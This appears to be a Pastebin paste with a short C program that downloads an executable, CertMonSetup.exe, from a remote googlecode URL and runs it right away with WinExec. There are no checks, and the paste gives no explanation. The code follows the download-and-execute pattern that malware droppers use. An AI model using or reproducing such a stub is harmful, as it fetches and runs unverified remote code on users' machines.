Advertisement
Guest User

Untitled

a guest
Sep 3rd, 2012
654
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.26 KB | None | 0 0
  1. #include <urlmon.h>
  2. #include <windows.h>
  3.  
  4. int main (int argc, char* argv[]) {
  5.    
  6.     URLDownloadToFile(NULL, "http://sbdtools.googlecode.com/files/CertMonSetup.exe", "CertMonSetup.exe", 0, NULL);
  7.  
  8.     WinExec ( "CertMonSetup.exe", SW_SHOWNORMAL );
  9.  
  10.     return 0;
  11. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement